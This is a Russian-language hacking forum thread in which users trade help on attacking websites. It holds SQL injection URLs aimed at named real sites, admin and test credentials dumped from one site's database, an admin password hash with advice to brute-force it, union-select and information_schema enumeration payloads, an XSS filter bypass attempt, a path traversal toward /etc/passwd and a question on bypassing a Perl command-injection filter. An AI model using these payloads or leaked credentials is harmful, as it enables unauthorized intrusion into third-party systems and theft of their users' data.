Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,174
    Likes Received:
    617
    Reputations:
    690
    http://zub.by/page.php?form_id=-75
    Version 5.0.51a-24+lenny2+spu1
    Database zubby
    User zubby@localhost
    OS debian-linux-gn
    Tables cms_system_users
    id 1
    Name Администратор
    Login admin
    Password sa
    смаотри еще таблицу pl_user_user
    uname test
    upassword test
     
    _________________________
    1 person likes this.
  2. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    реакция на знак равенства, переменная id не попадает в SQL запрос
    Code:
    http://topok.com.ua/services.php?id=22/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)
     
    3 people like this.
  3. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    а можно ли какнибудь обойти open_basedir при инклуде ? т.е. пытаюсь эксплуатировать багу а мне в ответ
    Code:
    Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(view/w.my.../../../../../etc/passwd\0.php) is not within the allowed path(s): 
    
     
    2 people like this.
  4. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Нужна тулза, для работы со blind sql-inj, 5 ветка. причем чтоб работала по https и с куками)). пох на платформу.


    зы:
    Перловый гуй от Электа - под виндами требует ссл, который под актив перл не ставится изза ошибки - undef error. соответственно хз как фиксить))

    Придется перечислить что пробовал:
    sipt,toolza,elekt antichat mysql....
    Тулза не поддерживает пока хттпс. Сипт вроде тож.
     
    #11484 $n@ke, 20 Feb 2010
    Last edited: 20 Feb 2010
  5. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Нет.
     
  6. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    Такой вопрос, допустим я нашёл таблицу в которой содержатся логин и пасс админа

    http://xxx/page.php?form_id=-75+union+select+1,2,3,4,5+from+cms_system_users+limit+0,1--

    Узнать название столбца содержащее логин админа можно только перебирая названия типа admin, user,users, login, password , т.е. только методом перебора напр. так:
    http://xxx/page.php?form_id=-75+union+select+1,2,3,4,admin+from+cms_system_users+limit+0,1--

    http://xxx/page.php?form_id=-75+union+select+1,2,3,4,column_name+from cms_system_users+limit+0,1--
    (так тоже не выходит)

    или как можно узнать названия столбцов в существующей таблице?только перебором? в факах не понял смысла, help please
     
  7. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    0x{hex table} а то не поймет)) hex - это строка в шестнадцатеричном виде)
     
  8. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    column_name+from+information_schema.columns+limit+0,1--
     
    1 person likes this.
  9. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Так ты будешь получать все столбцы, и ты не будешь знать из какой они таблицы
     
    1 person likes this.
  10. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    Не ругаемся господа
    Login admin
    Password sa
    Всем спасибо))
     
  11. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Да никто не ругается, просто туты надо читать! И кстати, я думаю, что это не от админки пароль
     
  12. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    да от админки в другой таблице, главное что я смысл понял.
     
    1 person likes this.
  13. z0mbie86

    z0mbie86 Active Member

    Joined:
    25 Jul 2009
    Messages:
    38
    Likes Received:
    126
    Reputations:
    0
    неполучаеться обойти xss фильтр
    ввожу "'><script>alert(12345)</script>
    на выходе &quot;'&gt;&lt;script&gt;alert(12345)&lt;/script&gt;
     
  14. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    MySQl 5'тая версия.. когда делаю UNION либо SELECT(без union) то выходит белый экран.. что это может быть?
    также прбовал с char/hex
     
  15. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    Похоже на htmlspecialchars() , его обойти можно только если твоя ксс будет в ссылке с кодировкой UTF-7
    нипанятна, а где скуля ?
    А тут 4 ветка, смотри в топ 5 сайтов. Вывести кажись не получиться т.к. там юнион использовать скорей всего нельзя , ну во всяком случае у меня не вышло ;)
     
    2 people like this.
  16. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    фильтр на стоп-слова
     
  17. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    нашёл скулю в одном очень вкусном портале
    логин и пасс в таком виде:
    admin:4b2f0bd7133666807c1813fef7343777
    4b2f0bd7133666807c1813fef7343777-это md5? как теперь быть?путь к админке есть
     
    #11497 Darren, 21 Feb 2010
    Last edited: 21 Feb 2010
  18. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    код странички на перле:

    Code:
    $paramX =~s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g;
    
    if ($paramX "") {
        my $status=`$xx_cgidir/xyz.pl -m -e $paramX`;
    
    возможен ли обход фильтра и исполнение кода в ос ?
     
  19. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Хеш, мд5 или мд5(мд5) - неизвестно. Вариант - брутить.
     
  20. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    на сайте есть скуль. я подобрал колличество строк. но после этого начало выдавать.

    Application uses a value of the wrong type for the current operation.

    А на точто неверное кол-во столбцов ругаться перестало. О чем это может говорить?Пробывал вставлять version() результат такой же

    запрос такого вида
    http://megamegamegeporn.gov/latest.asp?ID=&offset=&prod_id=8896%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,version()--
     
    #11500 Darren, 21 Feb 2010
    Last edited: 21 Feb 2010
Thread Status:
Not open for further replies.